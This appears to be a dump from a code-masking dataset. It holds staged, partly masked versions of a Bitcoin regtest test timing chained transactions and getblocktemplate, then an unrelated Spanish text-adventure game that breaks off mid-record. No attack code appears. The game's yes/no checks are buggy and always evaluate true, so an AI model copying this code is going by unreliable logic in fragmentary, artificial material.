Generates tx chain and send it to node \"\"\"\n for i in range(CHAINED_TX):\n sent_txid, sent_value, this_sendtx, tx_size = (self.\n chain_transaction(self.nodes[0], self.txid, 0, self.value,\n self.fee, 1))\n if not self.chain_top:\n self.chain_top = sent_txid\n self.txid = sent_txid\n self.value = sent_value\n self.chain.append(sent_txid)\n self.mempool_send += this_sendtx\n self.mempool_size += tx_size\n\n def create_new_block(self):\n \"\"\" Create a new block with an anyone-can-spend coinbase \"\"\"\n block = create_block(self.tip, create_coinbase(self.height), self.\n block_time)\n self.block_time += 1\n block.solve()\n return block\n\n def mempool_count(self):\n \"\"\" get count of tx in mempool \"\"\"\n mininginfo = self.nodes[0].getmininginfo()\n return mininginfo['pooledtx']\n\n def dumppool(self, mempool):\n \"\"\" Show list of chained tx in mempool with parent(depends) \"\"\"\n\n def sortdepends(e):\n return e['descendantcount']\n sortedlist = [[k, v] for k, v in mempool.items()]\n sortedlist = sorted(sortedlist, key=lambda l: l[1][\n 'descendantcount'], reverse=True)\n for memkv in sortedlist:\n memtx = memkv[1]\n self.log.info('{} {} {}'.format(memkv[0], memtx[\n 'descendantcount'], memtx['depends']))\n\n def run_test(self):\n self.log.info('Starting Test with {0} Chained Transactions'.format(\n CHAINED_TX))\n self.chain_top = None\n self.mine_blocks()\n self.mempool_send = 0\n self.mempool_size = 0\n self.chain = []\n self.send_chain_to_node()\n assert self.mempool_count() == CHAINED_TX\n mempool = self.nodes[0].getrawmempool(True)\n self.log.info('tx at top has {} descendants'.format(mempool[self.\n chain_top]['descendantcount']))\n assert mempool[self.chain_top]['descendantcount'] == CHAINED_TX\n self.height = 1\n self.block1 = self.create_new_block()\n self.tip = self.block1.sha256\n self.height += 1\n for i in range(100):\n block = self.create_new_block()\n self.tip = block.sha256\n self.height += 1\n self.runs = []\n for test_iteration in range(TEST_ITERATIONS):\n gbt_start = time.perf_counter()\n templat = self.nodes[0].getblocktemplate()\n gbt_stop = time.perf_counter()\n assert len(templat['transactions']) == CHAINED_TX\n self.runs.append(gbt_stop - gbt_start)\n self.log.info('Mempool size {0}'.format(self.mempool_size))\n self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))\n if len(self.runs) > 1:\n self.log.info('run times {}'.format(self.runs))\n self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs) / len(\n self.runs)))\n\n\n<mask token>\n", "step-4": "<mask token>\nif len(sys.argv) > 1:\n CHAINED_TX = int(sys.argv[1])\n<mask token>\nif len(sys.argv) > 2:\n TEST_ITERATIONS = int(sys.argv[2])\n<mask token>\n\n\nclass ChainedTest(BitcoinTestFramework):\n\n def set_test_params(self):\n \"\"\" our test network requires a peer node so that getblocktemplate succeeds \"\"\"\n self.num_nodes = 2\n chained_args = ['-limitancestorcount=2000',\n '-limitdescendantcount=2000', '-limitancestorsize=1000',\n '-limitdescendantsize=1000', \n '-magneticanomalyactivationtime=%d' % MAGNETIC_ANOMALY_START_TIME]\n config_node2 = chained_args.copy()\n if DEBUG_MODE:\n chained_args.append(DEBUG_MODE)\n self.extra_args = [chained_args, config_node2]\n\n def chain_transaction(self, node, parent_txid, vout, value, fee,\n num_outputs):\n send_value = satoshi_round((value - fee) / num_outputs)\n inputs = [{'txid': parent_txid, 'vout': vout}]\n outputs = {}\n for i in range(num_outputs):\n outputs[node.getnewaddress()] = send_value\n rawtx = node.createrawtransaction(inputs, outputs)\n signedtx = node.signrawtransaction(rawtx)\n sendtx_start = time.perf_counter()\n new_txid = node.sendrawtransaction(signedtx['hex'])\n sendtx_stop = time.perf_counter()\n fulltx = node.getrawtransaction(new_txid, 1)\n assert len(fulltx['vout']) == num_outputs\n return new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size']\n\n def mine_blocks(self):\n \"\"\" Mine some blocks and have them mature. \"\"\"\n self.nodes[0].generate(101)\n self.utxo = self.nodes[0].listunspent(10)\n self.txid = self.utxo[0]['txid']\n self.coinbasetx = self.txid\n self.vout = self.utxo[0]['vout']\n self.value = self.utxo[0]['amount']\n self.fee = Decimal('0.0001')\n self.tip = int('0x' + self.nodes[0].getbestblockhash(), 0)\n self.block_time = int(time.time()) + 1\n\n def send_chain_to_node(self):\n \"\"\" Generates tx chain and send it to node \"\"\"\n for i in range(CHAINED_TX):\n sent_txid, sent_value, this_sendtx, tx_size = (self.\n chain_transaction(self.nodes[0], self.txid, 0, self.value,\n self.fee, 1))\n if not self.chain_top:\n self.chain_top = sent_txid\n self.txid = sent_txid\n self.value = sent_value\n self.chain.append(sent_txid)\n self.mempool_send += this_sendtx\n self.mempool_size += tx_size\n\n def create_new_block(self):\n \"\"\" Create a new block with an anyone-can-spend coinbase \"\"\"\n block = create_block(self.tip, create_coinbase(self.height), self.\n block_time)\n self.block_time += 1\n block.solve()\n return block\n\n def mempool_count(self):\n \"\"\" get count of tx in mempool \"\"\"\n mininginfo = self.nodes[0].getmininginfo()\n return mininginfo['pooledtx']\n\n def dumppool(self, mempool):\n \"\"\" Show list of chained tx in mempool with parent(depends) \"\"\"\n\n def sortdepends(e):\n return e['descendantcount']\n sortedlist = [[k, v] for k, v in mempool.items()]\n sortedlist = sorted(sortedlist, key=lambda l: l[1][\n 'descendantcount'], reverse=True)\n for memkv in sortedlist:\n memtx = memkv[1]\n self.log.info('{} {} {}'.format(memkv[0], memtx[\n 'descendantcount'], memtx['depends']))\n\n def run_test(self):\n self.log.info('Starting Test with {0} Chained Transactions'.format(\n CHAINED_TX))\n self.chain_top = None\n self.mine_blocks()\n self.mempool_send = 0\n self.mempool_size = 0\n self.chain = []\n self.send_chain_to_node()\n assert self.mempool_count() == CHAINED_TX\n mempool = self.nodes[0].getrawmempool(True)\n self.log.info('tx at top has {} descendants'.format(mempool[self.\n chain_top]['descendantcount']))\n assert mempool[self.chain_top]['descendantcount'] == CHAINED_TX\n self.height = 1\n self.block1 = self.create_new_block()\n self.tip = self.block1.sha256\n self.height += 1\n for i in range(100):\n block = self.create_new_block()\n self.tip = block.sha256\n self.height += 1\n self.runs = []\n for test_iteration in range(TEST_ITERATIONS):\n gbt_start = time.perf_counter()\n templat = self.nodes[0].getblocktemplate()\n gbt_stop = time.perf_counter()\n assert len(templat['transactions']) == CHAINED_TX\n self.runs.append(gbt_stop - gbt_start)\n self.log.info('Mempool size {0}'.format(self.mempool_size))\n self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))\n if len(self.runs) > 1:\n self.log.info('run times {}'.format(self.runs))\n self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs) / len(\n self.runs)))\n\n\nif __name__ == '__main__':\n ChainedTest().main()\n", "step-5": "#!/usr/bin/env python3\n# Copyright (c) 2018 Nobody\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Test perforance of descendant package (chained transactions)\"\"\"\nimport time\nimport copy\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import *\nfrom test_framework.mininode import COIN\nfrom test_framework.blocktools import *\n\n\"\"\"Read optional arguments from command line\"\"\"\nCHAINED_TX = 25\nif len(sys.argv)>1:\n CHAINED_TX = int(sys.argv[1])\nTEST_ITERATIONS = 1\nif len(sys.argv)>2:\n TEST_ITERATIONS = int(sys.argv[2])\nDEBUG_MODE = '-printtoconsole'\n\nMAX_ANCESTORS = CHAINED_TX\nMAX_DESCENDANTS = CHAINED_TX\n\nMAGNETIC_ANOMALY_START_TIME = 2000000000\n\nclass ChainedTest(BitcoinTestFramework):\n\n def set_test_params(self):\n ''' our test network requires a peer node so that getblocktemplate succeeds '''\n self.num_nodes = 2\n chained_args = [\"-limitancestorcount=2000\", \"-limitdescendantcount=2000\",\n \"-limitancestorsize=1000\", \"-limitdescendantsize=1000\",\n \"-magneticanomalyactivationtime=%d\" % MAGNETIC_ANOMALY_START_TIME\n ]\n config_node2 = chained_args.copy()\n if DEBUG_MODE:\n chained_args.append(DEBUG_MODE)\n self.extra_args = [chained_args, config_node2]\n\n # Build a transaction that spends parent_txid:vout\n # Return amount sent\n def chain_transaction(self, node, parent_txid, vout, value, fee, num_outputs):\n send_value = satoshi_round((value - fee) / num_outputs)\n inputs = [{'txid': parent_txid, 'vout': vout}]\n outputs = {}\n for i in range(num_outputs):\n outputs[node.getnewaddress()] = send_value\n rawtx = node.createrawtransaction(inputs, outputs)\n signedtx = node.signrawtransaction(rawtx)\n\n #measure the performance of sending the raw transaction to the node\n sendtx_start = time.perf_counter()\n new_txid = node.sendrawtransaction(signedtx['hex'])\n sendtx_stop = time.perf_counter()\n fulltx = node.getrawtransaction(new_txid, 1)\n\n #self.log.info('{0} => {1}'.format(parent_txid, fulltx['vout'][0]))\n\n # make sure we didn't generate a change output\n assert(len(fulltx['vout']) == num_outputs)\n return (new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size'])\n\n def mine_blocks(self):\n ''' Mine some blocks and have them mature. '''\n self.nodes[0].generate(101)\n self.utxo = self.nodes[0].listunspent(10)\n self.txid = self.utxo[0]['txid']\n self.coinbasetx = self.txid\n self.vout = self.utxo[0]['vout']\n self.value = self.utxo[0]['amount']\n self.fee = Decimal(\"0.0001\")\n self.tip = int(\"0x\" + self.nodes[0].getbestblockhash(), 0)\n self.block_time = int(time.time()) + 1\n\n def send_chain_to_node(self):\n ''' Generates tx chain and send it to node '''\n for i in range(CHAINED_TX):\n (sent_txid, sent_value, this_sendtx, tx_size) = self.chain_transaction(\n self.nodes[0], self.txid, 0, self.value, self.fee, 1)\n if not self.chain_top:\n self.chain_top = sent_txid\n self.txid = sent_txid\n self.value = sent_value\n self.chain.append(sent_txid)\n self.mempool_send += this_sendtx\n self.mempool_size += tx_size\n\n def create_new_block(self):\n ''' Create a new block with an anyone-can-spend coinbase '''\n block = create_block(\n self.tip, create_coinbase(self.height), self.block_time)\n self.block_time += 1\n block.solve()\n return block\n\n def mempool_count(self):\n ''' get count of tx in mempool '''\n mininginfo = self.nodes[0].getmininginfo()\n return mininginfo['pooledtx']\n\n def dumppool(self, mempool):\n ''' Show list of chained tx in mempool with parent(depends) '''\n def sortdepends(e):\n return e['descendantcount']\n sortedlist = [[k,v] for k,v in mempool.items()]\n sortedlist = sorted(sortedlist, key=lambda l: l[1]['descendantcount'], reverse=True)\n for memkv in sortedlist:\n memtx = memkv[1]\n self.log.info('{} {} {}'.format(memkv[0], memtx['descendantcount'], memtx['depends']))\n\n def run_test(self):\n self.log.info('Starting Test with {0} Chained Transactions'.format(CHAINED_TX))\n self.chain_top = None\n\n self.mine_blocks()\n\n self.mempool_send = 0\n self.mempool_size = 0\n self.chain = []\n\n self.send_chain_to_node()\n\n # mempool should have all our tx\n assert(self.mempool_count() == CHAINED_TX)\n mempool = self.nodes[0].getrawmempool(True)\n self.log.info('tx at top has {} descendants'.format(mempool[self.chain_top][\"descendantcount\"]))\n assert(mempool[self.chain_top][\"descendantcount\"] == CHAINED_TX)\n\n #self.dumppool(mempool)\n\n self.height = 1\n\n # create new block and save coinbase\n self.block1 = self.create_new_block()\n self.tip = self.block1.sha256\n self.height += 1\n\n #mature the block so we can spend the coinbase\n for i in range(100):\n block = self.create_new_block()\n self.tip = block.sha256\n self.height += 1\n\n #sync pool not needed as long as we are using node 0 which has all the tx we sent to it\n #sync_mempools(self.nodes, wait=1, timeout=100)\n\n self.runs=[]\n for test_iteration in range(TEST_ITERATIONS):\n # do not use perf_counter. use timer from -printtoconsole instead\n gbt_start = time.perf_counter()\n # assemble a block and validate all tx in it\n templat = self.nodes[0].getblocktemplate()\n gbt_stop = time.perf_counter()\n # make sure all tx got mined\n assert(len(templat['transactions']) == CHAINED_TX)\n self.runs.append(gbt_stop - gbt_start)\n\n #assert(self.mempool_count() == 0)\n\n self.log.info('Mempool size {0}'.format(self.mempool_size))\n self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))\n if len(self.runs) > 1:\n self.log.info('run times {}'.format(self.runs))\n self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs)/len(self.runs)))\n\nif __name__ == '__main__':\n ChainedTest().main()\n", "step-ids": [ 7, 8, 9, 10, 13 ] }
[ 7, 8, 9, 10, 13 ]
# -*- coding: utf-8 -*- from Clases import Lugar from Clases import Evento import Dialogos import Funciones puntuacion_necesaria = 10 hp_inicial = 5 eventos = [ Evento("dormir", 2, False, -3, 4, Dialogos.descripciones_eventos[0], Dialogos.descripciones_triunfos[0], Dialogos.descripciones_castigos[0]), Evento("cazar", 1, False, -2, 3, Dialogos.descripciones_eventos[1], Dialogos.descripciones_triunfos[1], Dialogos.descripciones_castigos[1]), Evento("comer", 2, False, 1, 1, Dialogos.descripciones_eventos[2], Dialogos.descripciones_triunfos[2], Dialogos.descripciones_castigos[2]), Evento("hablar", 0, True, -3, 2, Dialogos.descripciones_eventos[3], Dialogos.descripciones_triunfos[3], Dialogos.descripciones_castigos[3]), Evento("escalar", 0, True, -4, 3, Dialogos.descripciones_eventos[4], Dialogos.descripciones_triunfos[4], Dialogos.descripciones_castigos[4]), Evento("rodear", 0, False, -1, 3, Dialogos.descripciones_eventos[5], Dialogos.descripciones_triunfos[5], Dialogos.descripciones_castigos[5]), Evento("pescar", 2, False, -4, 2, Dialogos.descripciones_eventos[6], Dialogos.descripciones_triunfos[6], Dialogos.descripciones_castigos[6]), Evento("contar chiste", 0, True, 0, 6, Dialogos.descripciones_eventos[7], Dialogos.descripciones_triunfos[7], Dialogos.descripciones_castigos[7]), Evento("comprar", 3, False, 0, 6, Dialogos.descripciones_eventos[8], Dialogos.descripciones_triunfos[8], Dialogos.descripciones_castigos[8]) ] dormir = eventos[0] cazar = eventos[1] comer = eventos[2] hablar = eventos[3] escalar = eventos[4] rodear = eventos[5] pescar = eventos[6] contar_chiste = eventos[7] comprar = eventos[8] lugares = [ Lugar(1, 20, Dialogos.descripciones_lugares[0], dormir, cazar), Lugar(21, 40, Dialogos.descripciones_lugares[1], comer, hablar), Lugar(41, 75, Dialogos.descripciones_lugares[2], escalar, rodear), Lugar(76, 90, Dialogos.descripciones_lugares[3], dormir, pescar), Lugar(91, 100, Dialogos.descripciones_lugares[4], contar_chiste, comprar) ] bosque = lugares[0] ciudad = lugares[1] montana = lugares[2] lago = lugares[3] viajero = lugares[4] print(Dialogos.saludo[0]) nombre = input(Dialogos.saludo[1]) edad = int(input(Dialogos.saludo[2])) print("\nHola", nombre, "tienes,", edad, "años.") if edad >= 18: print("¡Tienes edad suficiente para jugar!") quiere_jugar = input("¿Quieres jugar? ").lower() if quiere_jugar == "si" or "yes" or "y" or "s": puede_jugar = True print("\n¡Comienza la aventura! (HP = 5)\n") else: puede_jugar = False print("Adiós...") elif edad >= 13: print("¡Puedes jugar bajo supervisión!") quiere_jugar = input("¿Quieres jugar? ").lower() if quiere_jugar == "si": puede_jugar = True print("\n¡Comienza la aventura!\n") else: puede_jugar = False print("Adiós...") else: puede_jugar = False print("¡Eres muy joven para jugar!") print("Adiós...") while puede_jugar: puntuacion = 0 hp = hp_inicial derrota = False while puntuacion < puntuacion_necesaria and derrota == False: dado = Funciones.roll_dice(100) if dado <= 20: lugar_actual = bosque elif dado <= 35: lugar_actual = ciudad elif dado <= 65: lugar_actual = montana elif dado <= 95: lugar_actual = lago else: lugar_actual = viajero print(lugar_actual.descripcion) print("a)", lugar_actual.evento_1.nombre, "b)", lugar_actual.evento_2.nombre) decision = "" while decision != "a" and decision != "b": decision = input() if decision != "a" and decision != "b": print("Esa opción no existe.") if decision == "a": evento_actual = lugar_actual.evento_1 else: evento_actual = lugar_actual.evento_2 print(evento_actual.descripcion) (hp, puntuacion, derrota) = Funciones.interactuar(evento_actual, puntuacion, hp, derrota) print("\n") Funciones.comprobar_victoria(derrota, puntuacion) quiere_jugar = input("\n¿Reintentar? ").lower() print("\n") if quiere_jugar != "si" and "yes" and "y" and "s": puede_jugar = False
normal
{ "blob_id": "fe45fc6cd16be37b320844c5a8b43a964c016dd1", "index": 5018, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(Dialogos.saludo[0])\n<mask token>\nprint('\\nHola', nombre, 'tienes,', edad, 'años.')\nif edad >= 18:\n print('¡Tienes edad suficiente para jugar!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si' or 'yes' or 'y' or 's':\n puede_jugar = True\n print('\\n¡Comienza la aventura! (HP = 5)\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelif edad >= 13:\n print('¡Puedes jugar bajo supervisión!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si':\n puede_jugar = True\n print('\\n¡Comienza la aventura!\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelse:\n puede_jugar = False\n print('¡Eres muy joven para jugar!')\n print('Adiós...')\nwhile puede_jugar:\n puntuacion = 0\n hp = hp_inicial\n derrota = False\n while puntuacion < puntuacion_necesaria and derrota == False:\n dado = Funciones.roll_dice(100)\n if dado <= 20:\n lugar_actual = bosque\n elif dado <= 35:\n lugar_actual = ciudad\n elif dado <= 65:\n lugar_actual = montana\n elif dado <= 95:\n lugar_actual = lago\n else:\n lugar_actual = viajero\n print(lugar_actual.descripcion)\n print('a)', lugar_actual.evento_1.nombre, 'b)', lugar_actual.\n evento_2.nombre)\n decision = ''\n while decision != 'a' and decision != 'b':\n decision = input()\n if decision != 'a' and decision != 'b':\n print('Esa opción no existe.')\n if decision == 'a':\n evento_actual = lugar_actual.evento_1\n else:\n evento_actual = lugar_actual.evento_2\n print(evento_actual.descripcion)\n hp, puntuacion, derrota = Funciones.interactuar(evento_actual,\n puntuacion, hp, derrota)\n print('\\n')\n Funciones.comprobar_victoria(derrota, puntuacion)\n quiere_jugar = input('\\n¿Reintentar? ').lower()\n print('\\n')\n if quiere_jugar != 'si' and 'yes' and 'y' and 's':\n puede_jugar = False\n", "step-3": "<mask token>\npuntuacion_necesaria = 10\nhp_inicial = 5\neventos = [Evento('dormir', 2, False, -3, 4, Dialogos.descripciones_eventos\n [0], Dialogos.descripciones_triunfos[0], Dialogos.\n descripciones_castigos[0]), Evento('cazar', 1, False, -2, 3, Dialogos.\n descripciones_eventos[1], Dialogos.descripciones_triunfos[1], Dialogos.\n descripciones_castigos[1]), Evento('comer', 2, False, 1, 1, Dialogos.\n descripciones_eventos[2], Dialogos.descripciones_triunfos[2], Dialogos.\n descripciones_castigos[2]), Evento('hablar', 0, True, -3, 2, Dialogos.\n descripciones_eventos[3], Dialogos.descripciones_triunfos[3], Dialogos.\n descripciones_castigos[3]), Evento('escalar', 0, True, -4, 3, Dialogos.\n descripciones_eventos[4], Dialogos.descripciones_triunfos[4], Dialogos.\n descripciones_castigos[4]), Evento('rodear', 0, False, -1, 3, Dialogos.\n descripciones_eventos[5], Dialogos.descripciones_triunfos[5], Dialogos.\n descripciones_castigos[5]), Evento('pescar', 2, False, -4, 2, Dialogos.\n descripciones_eventos[6], Dialogos.descripciones_triunfos[6], Dialogos.\n descripciones_castigos[6]), Evento('contar chiste', 0, True, 0, 6,\n Dialogos.descripciones_eventos[7], Dialogos.descripciones_triunfos[7],\n Dialogos.descripciones_castigos[7]), Evento('comprar', 3, False, 0, 6,\n Dialogos.descripciones_eventos[8], Dialogos.descripciones_triunfos[8],\n Dialogos.descripciones_castigos[8])]\ndormir = eventos[0]\ncazar = eventos[1]\ncomer = eventos[2]\nhablar = eventos[3]\nescalar = eventos[4]\nrodear = eventos[5]\npescar = eventos[6]\ncontar_chiste = eventos[7]\ncomprar = eventos[8]\nlugares = [Lugar(1, 20, Dialogos.descripciones_lugares[0], dormir, cazar),\n Lugar(21, 40, Dialogos.descripciones_lugares[1], comer, hablar), Lugar(\n 41, 75, Dialogos.descripciones_lugares[2], escalar, rodear), Lugar(76, \n 90, Dialogos.descripciones_lugares[3], dormir, pescar), Lugar(91, 100,\n Dialogos.descripciones_lugares[4], contar_chiste, comprar)]\nbosque = lugares[0]\nciudad = lugares[1]\nmontana = lugares[2]\nlago = lugares[3]\nviajero = lugares[4]\nprint(Dialogos.saludo[0])\nnombre = input(Dialogos.saludo[1])\nedad = int(input(Dialogos.saludo[2]))\nprint('\\nHola', nombre, 'tienes,', edad, 'años.')\nif edad >= 18:\n print('¡Tienes edad suficiente para jugar!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si' or 'yes' or 'y' or 's':\n puede_jugar = True\n print('\\n¡Comienza la aventura! (HP = 5)\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelif edad >= 13:\n print('¡Puedes jugar bajo supervisión!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si':\n puede_jugar = True\n print('\\n¡Comienza la aventura!\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelse:\n puede_jugar = False\n print('¡Eres muy joven para jugar!')\n print('Adiós...')\nwhile puede_jugar:\n puntuacion = 0\n hp = hp_inicial\n derrota = False\n while puntuacion < puntuacion_necesaria and derrota == False:\n dado = Funciones.roll_dice(100)\n if dado <= 20:\n lugar_actual = bosque\n elif dado <= 35:\n lugar_actual = ciudad\n elif dado <= 65:\n lugar_actual = montana\n elif dado <= 95:\n lugar_actual = lago\n else:\n lugar_actual = viajero\n print(lugar_actual.descripcion)\n print('a)', lugar_actual.evento_1.nombre, 'b)', lugar_actual.\n evento_2.nombre)\n decision = ''\n while decision != 'a' and decision != 'b':\n decision = input()\n if decision != 'a' and decision != 'b':\n print('Esa opción no existe.')\n if decision == 'a':\n evento_actual = lugar_actual.evento_1\n else:\n evento_actual = lugar_actual.evento_2\n print(evento_actual.descripcion)\n hp, puntuacion, derrota = Funciones.interactuar(evento_actual,\n puntuacion, hp, derrota)\n print('\\n')\n Funciones.comprobar_victoria(derrota, puntuacion)\n quiere_jugar = input('\\n¿Reintentar? ').lower()\n print('\\n')\n if quiere_jugar != 'si' and 'yes' and 'y' and 's':\n puede_jugar = False\n", "step-4": "from Clases import Lugar\nfrom Clases import Evento\nimport Dialogos\nimport Funciones\npuntuacion_necesaria = 10\nhp_inicial = 5\neventos = [Evento('dormir', 2, False, -3, 4, Dialogos.descripciones_eventos\n [0], Dialogos.descripciones_triunfos[0], Dialogos.\n descripciones_castigos[0]), Evento('cazar', 1, False, -2, 3, Dialogos.\n descripciones_eventos[1], Dialogos.descripciones_triunfos[1], Dialogos.\n descripciones_castigos[1]), Evento('comer', 2, False, 1, 1, Dialogos.\n descripciones_eventos[2], Dialogos.descripciones_triunfos[2], Dialogos.\n descripciones_castigos[2]), Evento('hablar', 0, True, -3, 2, Dialogos.\n descripciones_eventos[3], Dialogos.descripciones_triunfos[3], Dialogos.\n descripciones_castigos[3]), Evento('escalar', 0, True, -4, 3, Dialogos.\n descripciones_eventos[4], Dialogos.descripciones_triunfos[4], Dialogos.\n descripciones_castigos[4]), Evento('rodear', 0, False, -1, 3, Dialogos.\n descripciones_eventos[5], Dialogos.descripciones_triunfos[5], Dialogos.\n descripciones_castigos[5]), Evento('pescar', 2, False, -4, 2, Dialogos.\n descripciones_eventos[6], Dialogos.descripciones_triunfos[6], Dialogos.\n descripciones_castigos[6]), Evento('contar chiste', 0, True, 0, 6,\n Dialogos.descripciones_eventos[7], Dialogos.descripciones_triunfos[7],\n Dialogos.descripciones_castigos[7]), Evento('comprar', 3, False, 0, 6,\n Dialogos.descripciones_eventos[8], Dialogos.descripciones_triunfos[8],\n Dialogos.descripciones_castigos[8])]\ndormir = eventos[0]\ncazar = eventos[1]\ncomer = eventos[2]\nhablar = eventos[3]\nescalar = eventos[4]\nrodear = eventos[5]\npescar = eventos[6]\ncontar_chiste = eventos[7]\ncomprar = eventos[8]\nlugares = [Lugar(1, 20, Dialogos.descripciones_lugares[0], dormir, cazar),\n Lugar(21, 40, Dialogos.descripciones_lugares[1], comer, hablar), Lugar(\n 41, 75, Dialogos.descripciones_lugares[2], escalar, rodear), Lugar(76, \n 90, Dialogos.descripciones_lugares[3], dormir, pescar), Lugar(91, 100,\n Dialogos.descripciones_lugares[4], contar_chiste, comprar)]\nbosque = lugares[0]\nciudad = lugares[1]\nmontana = lugares[2]\nlago = lugares[3]\nviajero = lugares[4]\nprint(Dialogos.saludo[0])\nnombre = input(Dialogos.saludo[1])\nedad = int(input(Dialogos.saludo[2]))\nprint('\\nHola', nombre, 'tienes,', edad, 'años.')\nif edad >= 18:\n print('¡Tienes edad suficiente para jugar!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si' or 'yes' or 'y' or 's':\n puede_jugar = True\n print('\\n¡Comienza la aventura! (HP = 5)\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelif edad >= 13:\n print('¡Puedes jugar bajo supervisión!')\n quiere_jugar = input('¿Quieres jugar? ').lower()\n if quiere_jugar == 'si':\n puede_jugar = True\n print('\\n¡Comienza la aventura!\\n')\n else:\n puede_jugar = False\n print('Adiós...')\nelse:\n puede_jugar = False\n print('¡Eres muy joven para jugar!')\n print('Adiós...')\nwhile puede_jugar:\n puntuacion = 0\n hp = hp_inicial\n derrota = False\n while puntuacion < puntuacion_necesaria and derrota == False:\n dado = Funciones.roll_dice(100)\n if dado <= 20:\n lugar_actual = bosque\n elif dado <= 35:\n lugar_actual = ciudad\n elif dado <= 65:\n lugar_actual = montana\n elif dado <= 95:\n lugar_actual = lago\n else:\n lugar_actual = viajero\n print(lugar_actual.descripcion)\n print('a)', lugar_actual.evento_1.nombre, 'b)', lugar_actual.\n evento_2.nombre)\n decision = ''\n while decision != 'a' and decision != 'b':\n decision = input()\n if decision != 'a' and decision != 'b':\n print('Esa opción no existe.')\n if decision == 'a':\n evento_actual = lugar_actual.evento_1\n else:\n evento_actual = lugar_actual.evento_2\n print(evento_actual.descripcion)\n hp, puntuacion, derrota = Funciones.interactuar(evento_actual,\n puntuacion, hp, derrota)\n print('\\n')\n Funciones.comprobar_victoria(derrota, puntuacion)\n quiere_jugar = input('\\n¿Reintentar? ').lower()\n print('\\n')\n if quiere_jugar != 'si' and 'yes' and 'y' and 's':\n puede_jugar = False\n", "step-5": "# -*- coding: utf-8 -*-\r\nfrom Clases import Lugar\r\nfrom Clases import Evento\r\n\r\nimport Dialogos\r\nimport Funciones\r\n\r\npuntuacion_necesaria = 10\r\nhp_inicial = 5\r\n\r\n\r\neventos = [\r\n Evento(\"dormir\", 2, False, -3, 4, Dialogos.descripciones_eventos[0], Dialogos.descripciones_triunfos[0],\r\n Dialogos.descripciones_castigos[0]),\r\n Evento(\"cazar\", 1, False, -2, 3, Dialogos.descripciones_eventos[1], Dialogos.descripciones_triunfos[1],\r\n Dialogos.descripciones_castigos[1]),\r\n Evento(\"comer\", 2, False, 1, 1, Dialogos.descripciones_eventos[2], Dialogos.descripciones_triunfos[2],\r\n Dialogos.descripciones_castigos[2]),\r\n Evento(\"hablar\", 0, True, -3, 2, Dialogos.descripciones_eventos[3], Dialogos.descripciones_triunfos[3],\r\n Dialogos.descripciones_castigos[3]),\r\n Evento(\"escalar\", 0, True, -4, 3, Dialogos.descripciones_eventos[4], Dialogos.descripciones_triunfos[4],\r\n Dialogos.descripciones_castigos[4]),\r\n Evento(\"rodear\", 0, False, -1, 3, Dialogos.descripciones_eventos[5], Dialogos.descripciones_triunfos[5],\r\n Dialogos.descripciones_castigos[5]),\r\n Evento(\"pescar\", 2, False, -4, 2, Dialogos.descripciones_eventos[6], Dialogos.descripciones_triunfos[6],\r\n Dialogos.descripciones_castigos[6]),\r\n Evento(\"contar chiste\", 0, True, 0, 6, Dialogos.descripciones_eventos[7], Dialogos.descripciones_triunfos[7],\r\n Dialogos.descripciones_castigos[7]),\r\n Evento(\"comprar\", 3, False, 0, 6, Dialogos.descripciones_eventos[8], Dialogos.descripciones_triunfos[8],\r\n Dialogos.descripciones_castigos[8])\r\n]\r\n\r\ndormir = eventos[0]\r\ncazar = eventos[1]\r\ncomer = eventos[2]\r\nhablar = eventos[3]\r\nescalar = eventos[4]\r\nrodear = eventos[5]\r\npescar = eventos[6]\r\ncontar_chiste = eventos[7]\r\ncomprar = eventos[8]\r\n\r\nlugares = [\r\n Lugar(1, 20, Dialogos.descripciones_lugares[0], dormir, cazar),\r\n Lugar(21, 40, Dialogos.descripciones_lugares[1], comer, hablar),\r\n Lugar(41, 75, Dialogos.descripciones_lugares[2], escalar, rodear),\r\n Lugar(76, 90, Dialogos.descripciones_lugares[3], dormir, pescar),\r\n Lugar(91, 100, Dialogos.descripciones_lugares[4], contar_chiste, comprar)\r\n]\r\n\r\nbosque = lugares[0]\r\nciudad = lugares[1]\r\nmontana = lugares[2]\r\nlago = lugares[3]\r\nviajero = lugares[4]\r\n\r\nprint(Dialogos.saludo[0])\r\nnombre = input(Dialogos.saludo[1])\r\nedad = int(input(Dialogos.saludo[2]))\r\n\r\nprint(\"\\nHola\", nombre, \"tienes,\", edad, \"años.\")\r\n\r\nif edad >= 18:\r\n print(\"¡Tienes edad suficiente para jugar!\")\r\n quiere_jugar = input(\"¿Quieres jugar? \").lower()\r\n\r\n if quiere_jugar == \"si\" or \"yes\" or \"y\" or \"s\":\r\n puede_jugar = True\r\n print(\"\\n¡Comienza la aventura! (HP = 5)\\n\")\r\n\r\n else:\r\n puede_jugar = False\r\n print(\"Adiós...\")\r\n\r\nelif edad >= 13:\r\n print(\"¡Puedes jugar bajo supervisión!\")\r\n quiere_jugar = input(\"¿Quieres jugar? \").lower()\r\n\r\n if quiere_jugar == \"si\":\r\n puede_jugar = True\r\n print(\"\\n¡Comienza la aventura!\\n\")\r\n else:\r\n puede_jugar = False\r\n print(\"Adiós...\")\r\n\r\nelse:\r\n puede_jugar = False\r\n print(\"¡Eres muy joven para jugar!\")\r\n print(\"Adiós...\")\r\n\r\nwhile puede_jugar:\r\n puntuacion = 0\r\n hp = hp_inicial\r\n derrota = 